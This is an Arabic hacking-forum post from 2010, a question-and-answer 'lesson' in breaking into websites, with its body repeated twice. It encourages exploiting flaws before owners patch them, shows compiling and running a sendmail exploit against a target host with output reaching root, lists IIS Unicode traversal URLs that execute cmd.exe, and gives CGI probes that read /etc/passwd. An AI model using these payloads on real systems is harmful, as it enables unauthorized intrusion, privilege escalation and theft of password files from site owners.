درس لإحتراف الهاك في اختراق المواقع
3 مشترك
صفحة 1 من اصل 1
درس لإحتراف الهاك في اختراق المواقع
من طرف MiDo الجمعة ديسمبر 03, 2010 4:16 am
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
أن شاء الله في تعلم أختراق المواقع وكيف يتم ولكن في البداية يجب أن نعلم أشياء عن الاختراق
في البداية أو بمعنى أخر نعرف أساسيات مطلوبة في علم اختراق المواقع وطبعا نحن نعرف
في اختراق الاجهزة أنه الأى بى هو الباب والبورت هو المفتاح له
بس في أختراق المواقع يوجد لنا باب ولكن المفتاح يختلف وهو الثغرات ومافي اختراق في الدنيا
بدون ثغرة المهم المفروض ما نقول ثغرة ولكن نقول ضعف أمنى :-
س1:- طيب ممكن تقول لى شنو هي الثغرات يعنى تعريف لها ؟؟
جـ:- الثغرات هى ضعف أمنى يساعدك فى دخول نظام معين وأختراقه وقد تكون أيضا الطريقة المساعدة
التى تخليك تتحول من user الى administrator يعنى من مستخدم الى المدير المتصرف وتتضمن ويجب
على الدوام معرفة الثغرات الامنيه الجديدة وأستثمارها حتى لا يتنبه أصحاب المواقع بيها
يرقعوها ( يتم تقفليها )
وأقرب مثال لهذه الثغرات الضعف الأمني الذى أكتشف في الاباتشى وهو سيرفر يركب على نظام ليونكس
وأى ضعف فى أحد البرامج أو قاعده بناء الموقع تعتبر ثغرة ومن الممكن استخدامها والأستفاده
منها في أختراق الموقع المراد أختراقه والتحكم في الموقع ومشاهدة الباسوردات وكل ما تريد عن طريقها
س2:- طيب كيف انا استثمر الثغره اذا انا لقيتها ؟؟؟
جـ:- من وقت ما أكتشفوا الثغرات كانت نسبة 99% من الثغرات تكون سكربتاتها مكتوبه بالغه C وانته تحتاج لمعرفة هذه اللغه أو
عليك تحويلها .
كما أن هناك العديد من الثغرات يحتاج الى #################### حتى انته تتمكن من الأستفاده من هذه الثغره أو بمعنى أخر الضعف
وعلى سبيل المثال بعض الثغرات الموجوده فى PHP تحتاج الى #################### PHP ومن هذه الكلام.
وعلى فكرة الضعف يكون في الاصدارات الخاصة
وكذالك في ثغره من نوع Kernel 2.2.x ولكن هذه المرة في نظام تشغيل ليونكس
( ملاحظه هذه الثغرات التى تكون باللغة C تكون سيكربتات توجوده فى الموقع ) وهناك أيضا سيكربتات أخرى مكتوبة باللغه perl
ولازم فى هذه الحالة تكون انته مركب لوينكس حتى الاوامر وأنا أنصحك تركب linux Redhat 7.3
لأنه أفضل من الماندريك
س3:- كيف أحول لغه البيرل ؟؟
جـ:- الطريقة جدا سهله كلها اوامر عادية في البداية انته سوى هذه الأمر
./file.pl
تعطيك هذه الرسالة
Access Denied---- هذه الرسالة توضح عدم الموافقه
أذا صار لك كذا كا عليك سوى كتا بته الامر هذه
chmod +x Conik.pl----- لاحظ مكان كونيك انته تكتب أسم الملف
وشغلة مره ثانية وشوف النتجيه راح تكون كذالك
#### ./Conik.pl
س4:- طيب بالنسبة للغة C
جـ:- حتى تحويل الملف لازم انته تخلى الملف يكون ملف تنفيذى بهذه الامر
gcc -o Conik Conik.c ------> لاحظ انه انته تكتب أسم الملف بدال أسمى كونيك المراد تغيرة
يعنى على سبيل المثال :-
gcc -o Conik conik.c
وراح يكون الملف جاهز بعد هذه الامر
./Conik.c
وبعد ماصار الملف جاهز
#### gcc -o sendmail sendmail.c
#### ./sendemail
Usage : sendmail
#### ./sendmail smtp.israel.com RedHat-7.3 anonymous anonymous -----> لاحظ انك انته تكتب هنا الموقع الى تريده مكان israel
connecting to host...
connected...
id
uid=0(root) gid=0(root)
لاحظ انه طلب ممنا الملقم للبرنامج Sendemail وكذالك طلب نظام التشغيل واليوزر والباسورد
وبعد هذه كله البرنامج أعطانا أمتياز Root بسبب قيام البرنامج بتنفيذ الـExan nofer
ملاحظة لا تضن أنه لمن انا حطيت البرنامج XXX. SENDMAIL بدون اى سبب أنا حطيت لك هذه المثال لآنه هناك ثغره فى هذه البرنامج
س5:- يا الله كل هذه حتى ثغره بس بطلت أنا ما اريد اتعلم
جـ:- لووووول حبيب قلبي هذه الطريقة المعقده شوية للثغرات في ثغرات ثانية حلوة وسهله جدا جدا
س6:- شنو هي قو ل يا Conik ترى هذه الطريقة يحتاجلها نظام تشغيل وكذالك لغه C و Perl
في تغرات تستخدم من خلال المتصفح يعنى انته تشوف ملعومات الموقع عبر المتصفح وتوصل الى ملف الباسوردات من هذه الطريقه
ومثال على هذه الثغرات PHP - CGI - UNICODE - VB - etc
س7:- اوووووة UNICODE أنا سمعت عنها كثير نفسى اشوف كيف شكلها وأعرف شنو هى ؟؟؟
جـ:- حبيبى UNICODE هى عبارة عن ضعف في نظام IIS في Microsoft مما تساعد في أختراق الموقع بكل سهوله عموما الاختراق بهذه الطرق سهل جدا
وسوف أضع أمثله على ثغرات UONICODE :-
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/########################s/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
حاولت قد المستطاع انى أشكل فى أنواع UONICODE
أما بالنسبة الى ثغرات الـ CGI هذه مثال عليها
/cgi-bin/view-source?../../../../../../../etc/passwd
/cgi-bin/phf
/cgi-bin/wwwboard.pl
/cgi-bin/AT-admin.cgi
/cgi-bin/info2www
/cgi-bin/environ.cgi
هذه وباقى العديد من الثغرات يعنى لا يقتصر الأمر على هذه الثغرات وراح أقسم الثغرات لك بحسب نظام التشغيل
NT : Uni code , bofferoverfollow , tftp
Liunx : Get Access , CGI , buffer overfollow , PHP , send mail , ProFTPD, WU-FTPD, Kernel Exploits, rootkits,
UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel exploits, rootkits, ProFTPD, WU-FTPD,
انتــــهى
أن شاء الله في تعلم أختراق المواقع وكيف يتم ولكن في البداية يجب أن نعلم أشياء عن الاختراق
في البداية أو بمعنى أخر نعرف أساسيات مطلوبة في علم اختراق المواقع وطبعا نحن نعرف
في اختراق الاجهزة أنه الأى بى هو الباب والبورت هو المفتاح له
بس في أختراق المواقع يوجد لنا باب ولكن المفتاح يختلف وهو الثغرات ومافي اختراق في الدنيا
بدون ثغرة المهم المفروض ما نقول ثغرة ولكن نقول ضعف أمنى :-
س1:- طيب ممكن تقول لى شنو هي الثغرات يعنى تعريف لها ؟؟
جـ:- الثغرات هى ضعف أمنى يساعدك فى دخول نظام معين وأختراقه وقد تكون أيضا الطريقة المساعدة
التى تخليك تتحول من user الى administrator يعنى من مستخدم الى المدير المتصرف وتتضمن ويجب
على الدوام معرفة الثغرات الامنيه الجديدة وأستثمارها حتى لا يتنبه أصحاب المواقع بيها
يرقعوها ( يتم تقفليها )
وأقرب مثال لهذه الثغرات الضعف الأمني الذى أكتشف في الاباتشى وهو سيرفر يركب على نظام ليونكس
وأى ضعف فى أحد البرامج أو قاعده بناء الموقع تعتبر ثغرة ومن الممكن استخدامها والأستفاده
منها في أختراق الموقع المراد أختراقه والتحكم في الموقع ومشاهدة الباسوردات وكل ما تريد عن طريقها
س2:- طيب كيف انا استثمر الثغره اذا انا لقيتها ؟؟؟
جـ:- من وقت ما أكتشفوا الثغرات كانت نسبة 99% من الثغرات تكون سكربتاتها مكتوبه بالغه C وانته تحتاج لمعرفة هذه اللغه أو
عليك تحويلها .
كما أن هناك العديد من الثغرات يحتاج الى #################### حتى انته تتمكن من الأستفاده من هذه الثغره أو بمعنى أخر الضعف
وعلى سبيل المثال بعض الثغرات الموجوده فى PHP تحتاج الى #################### PHP ومن هذه الكلام.
وعلى فكرة الضعف يكون في الاصدارات الخاصة
وكذالك في ثغره من نوع Kernel 2.2.x ولكن هذه المرة في نظام تشغيل ليونكس
( ملاحظه هذه الثغرات التى تكون باللغة C تكون سيكربتات توجوده فى الموقع ) وهناك أيضا سيكربتات أخرى مكتوبة باللغه perl
ولازم فى هذه الحالة تكون انته مركب لوينكس حتى الاوامر وأنا أنصحك تركب linux Redhat 7.3
لأنه أفضل من الماندريك
س3:- كيف أحول لغه البيرل ؟؟
جـ:- الطريقة جدا سهله كلها اوامر عادية في البداية انته سوى هذه الأمر
./file.pl
تعطيك هذه الرسالة
Access Denied---- هذه الرسالة توضح عدم الموافقه
أذا صار لك كذا كا عليك سوى كتا بته الامر هذه
chmod +x Conik.pl----- لاحظ مكان كونيك انته تكتب أسم الملف
وشغلة مره ثانية وشوف النتجيه راح تكون كذالك
#### ./Conik.pl
س4:- طيب بالنسبة للغة C
جـ:- حتى تحويل الملف لازم انته تخلى الملف يكون ملف تنفيذى بهذه الامر
gcc -o Conik Conik.c ------> لاحظ انه انته تكتب أسم الملف بدال أسمى كونيك المراد تغيرة
يعنى على سبيل المثال :-
gcc -o Conik conik.c
وراح يكون الملف جاهز بعد هذه الامر
./Conik.c
وبعد ماصار الملف جاهز
#### gcc -o sendmail sendmail.c
#### ./sendemail
Usage : sendmail
#### ./sendmail smtp.israel.com RedHat-7.3 anonymous anonymous -----> لاحظ انك انته تكتب هنا الموقع الى تريده مكان israel
connecting to host...
connected...
id
uid=0(root) gid=0(root)
لاحظ انه طلب ممنا الملقم للبرنامج Sendemail وكذالك طلب نظام التشغيل واليوزر والباسورد
وبعد هذه كله البرنامج أعطانا أمتياز Root بسبب قيام البرنامج بتنفيذ الـExan nofer
ملاحظة لا تضن أنه لمن انا حطيت البرنامج XXX. SENDMAIL بدون اى سبب أنا حطيت لك هذه المثال لآنه هناك ثغره فى هذه البرنامج
س5:- يا الله كل هذه حتى ثغره بس بطلت أنا ما اريد اتعلم
جـ:- لووووول حبيب قلبي هذه الطريقة المعقده شوية للثغرات في ثغرات ثانية حلوة وسهله جدا جدا
س6:- شنو هي قو ل يا Conik ترى هذه الطريقة يحتاجلها نظام تشغيل وكذالك لغه C و Perl
في تغرات تستخدم من خلال المتصفح يعنى انته تشوف ملعومات الموقع عبر المتصفح وتوصل الى ملف الباسوردات من هذه الطريقه
ومثال على هذه الثغرات PHP - CGI - UNICODE - VB - etc
س7:- اوووووة UNICODE أنا سمعت عنها كثير نفسى اشوف كيف شكلها وأعرف شنو هى ؟؟؟
جـ:- حبيبى UNICODE هى عبارة عن ضعف في نظام IIS في Microsoft مما تساعد في أختراق الموقع بكل سهوله عموما الاختراق بهذه الطرق سهل جدا
وسوف أضع أمثله على ثغرات UONICODE :-
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/########################s/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
حاولت قد المستطاع انى أشكل فى أنواع UONICODE
أما بالنسبة الى ثغرات الـ CGI هذه مثال عليها
/cgi-bin/view-source?../../../../../../../etc/passwd
/cgi-bin/phf
/cgi-bin/wwwboard.pl
/cgi-bin/AT-admin.cgi
/cgi-bin/info2www
/cgi-bin/environ.cgi
هذه وباقى العديد من الثغرات يعنى لا يقتصر الأمر على هذه الثغرات وراح أقسم الثغرات لك بحسب نظام التشغيل
NT : Uni code , bofferoverfollow , tftp
Liunx : Get Access , CGI , buffer overfollow , PHP , send mail , ProFTPD, WU-FTPD, Kernel Exploits, rootkits,
UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel exploits, rootkits, ProFTPD, WU-FTPD,
انتــــهى
MiDo- عضو مميز
- عدد المساهمات : 889
تاريخ التسجيل : 23/11/2010
الجنس :
تقيم : 17943
المزاج : تمام اخر حاجة
MiDo- عضو مميز
- عدد المساهمات : 889
تاريخ التسجيل : 23/11/2010
الجنس :
تقيم : 17943
المزاج : تمام اخر حاجة
_MaFia_- المدير العام
- عدد المساهمات : 2035
تاريخ التسجيل : 21/11/2010
الدولة :
الجنس :
تقيم : 21534
المزاج : tmam -
رد: درس لإحتراف الهاك في اختراق المواقع
من طرف _MeMo_ الأربعاء ديسمبر 29, 2010 5:57 pm
تسلم ايديك حبيبى
_MeMo_- مشرف
- عدد المساهمات : 770
تاريخ التسجيل : 21/11/2010
الدولة :
الجنس :
تقيم : 7317
المزاج : تمام
مواضيع مماثلة» تعليم اختراق المواقع من اول خطوة لاخر خطوة
» قوانين قسم اختراق المواقع
» قوانين قسم دورة اختراق المواقع
» برامج اختراق المواقع جميعها
» مصطلحات مهمة للمبتدئين في اختراق المواقع
» قوانين قسم اختراق المواقع
» قوانين قسم دورة اختراق المواقع
» برامج اختراق المواقع جميعها
» مصطلحات مهمة للمبتدئين في اختراق المواقع
صفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى
